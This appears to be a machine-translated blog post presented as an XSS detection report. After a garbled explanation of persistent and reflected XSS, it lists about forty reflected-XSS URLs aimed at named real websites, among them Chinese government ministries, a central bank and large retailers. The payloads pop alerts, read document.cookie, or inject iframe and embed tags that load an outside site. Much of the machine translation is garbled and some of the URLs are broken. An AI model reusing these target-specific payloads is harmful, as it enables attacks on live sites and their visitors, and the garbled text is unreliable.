Typical XSS cross-site scripting attack security detection report

Note: The following connections are successfully tested in the browser.

For a webpage, XSS inserts content into the webpage without authorization.

Is a vulnerability.

However, you are more concerned about inserting content instead of authorization. This content is often harmful.

The harm is more to other netizens accessing this page. The code you inserted is run on me.

Now there are many things. "Running here" means that the Code has an environment, so XSS must be based on the environment. What is the situation?

In the case of XSS, this is the most critical.

Generally, XSS is divided into persistence and non-persistence. Both of them open a link and then automatically run the code (malicious

Parameters created), the persistent type is the database where the code is stored on the server, like the user name of a website, self-introduced

Shao, password, etc. If not filtered, there will be XSS. When I access your page, because your name is a piece of code

I have endured this code and the potential losses of this Code. A non-persistent type is a link, a chain

There is a parameter in it, which is a piece of code. After I click it, the browser opens this link and the link points to the program to execute this generation.

Code parameter, and then return to me the running result. The execution is actually triggered by providing code parameters to the program, which is real-time.

 

First: mingwan B2B
Http://search. B2B .cn/product? K = % 3 cscript % 3 ealert (% 27RC % 27) % 3c % 2 fscript % 3e

Second: phoenixnet
Http://my.ifeng.com /? C = friends & a = visit & ftype = 6 & friendName = % 3C/title % 3E % 3 Cscript % 3 Ealert ('
RC ') % 3C/script % 3E

Third: China Electronic Network

Http://search.21ic.com/so.php? Keyword = % 3 Cscript % 3 Ealert % 28document. cookie % 29%
3C % 2 Fscript % 3E

Fourth: China Energy Network

Http://www.power-cn.cn/sample/search.asp? Txtitle = <script> alert (document. cookie) </scr
Ipt>

Fifth: 21CN
Http://tags.21cn.com/tagsSearch? Tags = % 3 Cscript % 3 Ealert () % 3C/script % 3E

Sixth: chinnet

Http://mall.cnki.net/magazine/articlesearch.aspx? Keys = % 3 Ciframe % 20src = 'HTTP: // www.chinaxiaoe.com '% 3E % 3C/iframe % 3E

Seventh: Computer World

Http://www.ccw.com.cn/search/search_article.php? Keyword = % 3C % 2 Fspan % 3E % 3 Cifra
Me + src % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E % 3C % 2 hour rame % 3E

Eighth: Suning Tesco

Http://www.suning.com/emall/Search? SearchKeywords = % 3 Cembed % 20SRC = HTTP: // WWW. CHINAXIAOE. COM % 3E % 3C/EMBED % 3E

Ninth: ANBO education www.2cto.com

Http://www.miiceic.org.cn/plus/search.php? Keyword = % 3 Ciframe + src % 3 Dhttp % 3A % 2F
% 2Fwww.chinaxiaoe.com % 3E % 3 Ciframe % 3E

Tenth: Pat

Net http://sse1.paipai.com/s-kt11l4oxquvw6sgiqyujn3barq3jjsolru4karusi74j48goi311h338
Kt1zn5ocpyvg6--1-48-80---3-4-3----2-2--128-0-0-PTAG,20084.2.2.html

11th: source code sky

Http://www.codesky.net/article/search? S = Random_Coder % 3C % 2 Ftitle % 3E % 3 Ciframe +
Src % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E % 3C % 2 20.rame % 3E

12th: Catalogue

Http://so.mop.com? Q = % 3C/title % 3E % 3 Cembed % 20src = Http: // www.chinaxiaoe.com % 3E % 3C/em
Bed % 3E

13th: Lili female

Http://search.rayli.com.cn/searchII.html? Lxkw = % 3C/span % 3E % 3 Cembed % 20src = http ://
Www.chinaxiaoe.com % 3E % 3C/embed % 3E

14th: glutinous rice Network

Http://www.nuomi.com/search? K = % 3C % 2 Ftitle % 3E % 3 Cembed + src % 3 DHttp % 3A % 2F %
2Fwww.chinaxiaoe.com % 3E % 3C % 2 Fembed % 3E

15th: CCN

Http://app.zhcw.com/wwwroot/zhcw/jsp/indexSearch.jsp? Query = Random_Coder % 3C % 2
Ftitle % 3E % 3 Cembed + src % 3 DHttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E & site = 2 & id = 1

18th: Pacific Network

Http://ks.pconline.com.cn/index.jsp? Q = % 3C % 2 Ftitle % 3E % 3 Cembed + src % 3 Dhttp % 3A %
2F % 2Fwww.chinaxiaoe.com % 3E

19th: pangu search

Http://news.panguso.com/newssearch.htm? OrderType = 1 & q = % 3C % 2 Ftitle % 3E % 3 Cembe
D + src % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E

20th: 7K7K games

Http://so.7k7k.com/game/1%22%2F%3E%3Cembed%20src%3Dhttp%3A%5C%2F%2Fwww.chinaxiaoe.com%3E.htm

21st: mobile search
Http: // 202.85.216.217/query? Qt = % 3C/title % 3E % 3 Cembed % 20src = http://www.chinaxiaoe.com % 3E

22nd: 19 th Floor

Http://www.19lou.com/search/thread? Keyword = % 3C % 2 Ftitle % 3E % 3 Cembed % 20src % 3
Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E

23rd: China Daily

Http://search.chinadaily.com.cn/all_en.jsp? SearchText = % 22% 3E % 3 Cembed + src % 3 Dhttp
% 3A % 2F % 2Fwww.chinaxiaoe.com % 3E

24th: Download

Http://www.verycd.com/search/entries/%3C%2Ftitle%3E%3Cembed%20src%3Dhttp%3
A % 2F % 2Fwww.chinaxiaoe.com % 3E

25th: Tianya community

Http://search.tianya.cn? Q = % 3C % 2 Ftitle % 3E % 3 Cembed % 20src % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E

26th: huajun Software Park

Http://search.newhua.com/search_list.php? Searchname = % 3C % 2 Ftitle % 3E % 3 Cembed %
2F * % 2 Fsrc % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E

28th: Beidou Mobile Network

Http://mobile.139shop.com/brand/0/0_0_0-0-0-0-0-0_%3C/title%3E%3Cembed%20src=
Http://www.chinaxiaoe.com %3e_00%1.htm

29th: appchina

Http://www.appchina.com/market/berry/search.action? Q = % 3 Cembed + src % 3 Dhttp % 3A
% 2F % 2Fwww.chinaxiaoe.com % 3E

30th: youren.com

Http://user.younet.com/search/default.php? Search_phone =\% 22/% 3E % 3 Cembed % 20src
Http://www.chinaxiaoe.com % 3E

31st: wheat bags

Http://search.mbaobao.com/searcher? K = % 3C % 2 Ftitle % 3E % 3 Cembed + src % 3 Dhttp % 3A
% 2F % 2Fwww.chinaxiaoe.com % 3E

32nd: cofco I buy Network

Http://www.womai.com/ProductList.htm? Keywords = % 3C % 2 Ftitle % 3E % 3 Cembed % 2F *
% 2 Fsrc % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E

33rd: Yangguang shopping

Http://www.cnrmall.com/ TV /product/search.jsp? Key = % 22/% 3E % 3 Cembed % 20src = http :/
/Www.chinaxiaoe.com % 3E

34th: Full-seat Network

Http://s.manzuo.com/search? Keyword = % 22% 2F % 3E % 3 Cembed % 20src % 3 Dhttp % 3A %
2F % 2Fwww.chinaxiaoe.com % 3E

35th: youtao ordering Network

Http://www.utao365.com/search.php? Encode = YTo1OntzOjg6ImNhdGVnb3J5IjtzOjE6IjAi
O3M6ODoia2V5d29yZHMiO3M6MzU6IjwvdGl0bGU % 2bPGVtYmVkIHNyYz1odHRwOi8vdG1
4ay5vcmc % duplicate
Signature =
=

36th: Meteorological Administration:
Http://www.cma.gov.cn: 8080/was40/search? Searchword = % 3 Cembed // src = http://www.chinaxiaoe.com % 3E

37th: Ministry of Transportation:
Http://search.moc.gov.cn: 8080/was40/search? Searchword = % 3 Cembed // src = http://www.chinaxiaoe.com % 3E
38th: Ministry of Culture:
Http://app.mcprc.gov.cn: 9000/was40/search? Channelid = 56599 & searchword = % 3 Ciframe
% 20src = http://www.chinaxiaoe.com % 3E % 3C/iframe % 3E

39th: People's Bank of China:
Http://www.pbc.gov.cn: 8080/dig/Default. jsp? Q = % 22/% 3E % 3 Ciframe % 20src = http://www.chinaxiaoe.com % 3E/iframe % 3E

40th: China Telecom
Http://search.chinatelecom.com.cn/was40/search? Searchword = % 3 Ciframe // src = http://www.chinaxiaoe.com % 3E % 3C/iframe % 3E

41st: Communist Youth League of China
Http://www.gqt.org.cn/was40/search? Channelid = 17472 & searchword = % 3 Ciframe // src = ht
Tp: // www.chinaxiaoe.com % 3E % 3C/iframe % 3E

42nd: Central compilation Board
Http://search.cctb.net: 8081/utf8/search. jsp? Channelid = 76134 & searchword = % 3 Ciframe //
Src = http://www.chinaxiaoe.com % 3E % 3C/iframe % 3E